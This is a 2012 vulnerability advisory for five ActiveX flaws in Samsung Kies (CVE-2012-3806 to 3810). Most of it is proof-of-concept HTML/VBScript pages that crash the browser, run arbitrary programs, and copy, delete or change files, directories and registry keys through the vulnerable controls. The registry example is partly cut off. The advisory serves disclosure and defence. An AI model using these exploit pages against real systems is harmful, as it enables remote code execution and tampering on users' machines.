Samsung Kies NULL Pointer Dereference and Improper Access Control Vulnerability
22 Oct. 2012
Summary
Multiple vulnerabilities have been found in Samsung Kies synchronization utility that allows remote attacker to compromise affected system, execute and modify arbitrary files, modify arbitrary directories and modify System Registry with privileges of the current user.
1) Null Pointer Dereference in Samsung Kies: CVE-2012-3806
The vulnerability exists due to a null pointer dereference error in GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control (DCAPARAGONGM.dll, GUID
{7650BC47-036D-4D5B-95B4-9D622C8D00A4}, located by default in "C:\Program Files(x86)\Samsung\Kies\External\DeviceModules\"). A remote attacker can pass "tagDATATABLE_SUID" argument equal to 0 to the GetDataTable() method and rise an ACCESS_VIOLATION exception on a MOV EDX,[EAX] instruction, as EAX is previously zeroed by an unexpected NULL value in the memory region pointed by ECX:
The following Proof of Concept code causes a browser to crash:
<html>
<!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
<head>
<title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
</head>
<script language='vbscript'>
Sub daPoC()
arg1=0
daTarget.GetDataTable arg1
End Sub
</script>
<body>
<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
<h4>Null Pointer Dereference PoC</h4>
<hr>
This simple PoC will crash Internet Explorer.<BR><BR>
<input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:7650BC47-036D-4D5B-95B4-9D622C8D00A4'
id='daTarget'></object>
</html>
2) Arbitrary File Execution in Samsung Kies: CVE-2012-3807
The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file execution vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
Arbitrary File Execution:
Run => Vulnerable
RunAt => Initial Exploit Test failed
RunAtNotExit => Initial Exploit Test failed
RunNotExit => Vulnerable
Arbitrary File Execution Proof of Concept:
<html>
<!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
<head>
<title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
</head>
<script language='vbscript'>
Sub daPoC()
daFile="iexplore https://www.htbridge.com/advisory/HTB23099";
daTarget.Run daFile
End Sub
</script>
<body>
<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
<h4>Arbitrary File Execution PoC</h4>
<hr>
This simple PoC will spawn IE and display more information about the vulnerability.<BR><BR>
<input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
</body>
<object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
</html>
3) Arbitrary File Modification in Samsung Kies: CVE-2012-3808
The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
Arbitrary File Modification Proof of Concept:
<html>
<!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
<head>
<title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
</head>
<script language='vbscript'>
Set daShell = CreateObject( "WScript.Shell" )
daRoot=daShell.ExpandEnvironmentStrings("%SystemRoot%")
daFileCopySource=daRoot & "\System32\drivers\etc\hosts" daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%")
daFileCopyDest=daprofile & "\Desktop\hosts"
daFileMoveDest=daprofile & "\Desktop\hosts.backup"
Sub daPoC()
daTarget.FileCopy daFileCopySource, daFileCopyDest
End Sub
Sub daPoC2()
daTarget.FileMoveSync daFileCopyDest, daFileMoveDest
End Sub
Sub daPoC3()
daTarget.FileDelete daFileMoveDest
End Sub
</script>
<body>
<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
<h4>Arbitrary File Modification PoC</h4>
<hr>
This simple PoC will copy your <script language='vbscript'>document.write(daFileCopySource)</script>
file into your desktop.<BR><BR>
<input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
<hr>
This simple PoC will move your <script language='vbscript'>document.write(daFileCopyDest)</script>
file into <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>
<input language=VBScript onclick=daPoC2() type=button value="Proof
of Concept">
<hr>
This simple PoC will delete <script
language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR>
<input language=VBScript onclick=daPoC3() type=button value="Proof of Concept">
</body>
<object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
</html>
4) Arbitrary Directory Modification in Samsung Kies: CVE-2012-3809
The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
Arbitrary Directory Modification Proof of Concept:
<html>
<!-- (c)oded by Frederic Bourla, High-Tech Bridge -->
<head>
<title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title>
</head>
<script language='vbscript'>
Set daShell = CreateObject( "WScript.Shell" )
daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%")
daDir=daprofile & "\Desktop\FRoGito"
Sub daPoC()
daTarget.DirCreate daDir
End Sub
Sub daPoC2()
daTarget.DirDelete daDir
End Sub
</script>
<body>
<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
<h4>Arbitrary Directory Modification PoC</h4>
<hr>
This simple PoC will create the <script language='vbscript'>document.write(daDir)</script>
directory.<BR><BR>
<input language=VBScript onclick=daPoC() type=button value="Proof of Concept">
<hr>
This simple PoC will delete the <script language='vbscript'>document.write(daDir)</script>
directory.<BR><BR>
<input language=VBScript onclick=daPoC2() type=button value="Proof of Concept">
</body>
<object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object>
</html>
5) Arbitrary Registry Modification in Samsung Kies: CVE-2012-3810
The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous Registry modification vulnerabilities present in "CmdAgentLib" (GUID:{1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.
Sub daPoC()
daTarget.RegiCreateKey daReg
End Sub
Sub daPoC2()
daTarget.RegiSetValueString daReg, daValueStrName, daValueStr
End Sub
Sub daPoC3()
daTarget.RegiSetValueInt daReg, daValueIntName, daValueInt
End Sub
Sub daPoC4()
daTarget.RegiDeleteValue daReg, daValueStrName
daTarget.RegiDeleteValue daReg, daValueIntName
End Sub
Sub daPoC5()
daTarget.RegiDeleteKey daReg
End Sub
</script>
<body>
<h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3>
<h4>Arbitrary Registry Modification PoC</h4>
<hr>
This simple PoC will create the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito
registry key.<BR><BR>
<input language=VBScript onclick=daPoC() type=button value="Proof
of Concept">
<hr>
This simple PoC will create the string value 'PoC_str' initialized to 'frederic.bourla () htbridge com'
in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGitoregistry key.<BR><BR>
<input language=VBScript onclick=daPoC2() type=button value="Proof of Concept">
<hr>
This simple PoC will create the int value 'PoC_int' initialized to 0x1F90 in the
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito
registry key.
<BR><BR>
<input language=VBScript onclick=daPoC3() type=button
value="Proof of Concept">
<hr>
This simple PoC will delete both string and hex values from the
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key
<BR><BR>
<input language=VBScript onclick=daPoC4() type=button value="Proof of Concept">
<hr>
This simple PoC will delete the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito
registry key.
<BR><BR>
<input language=VBScript onclick=daPoC5() type=button value="Proof of Concept">
</body>
<object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1'
id='daTarget'></object>
</html>
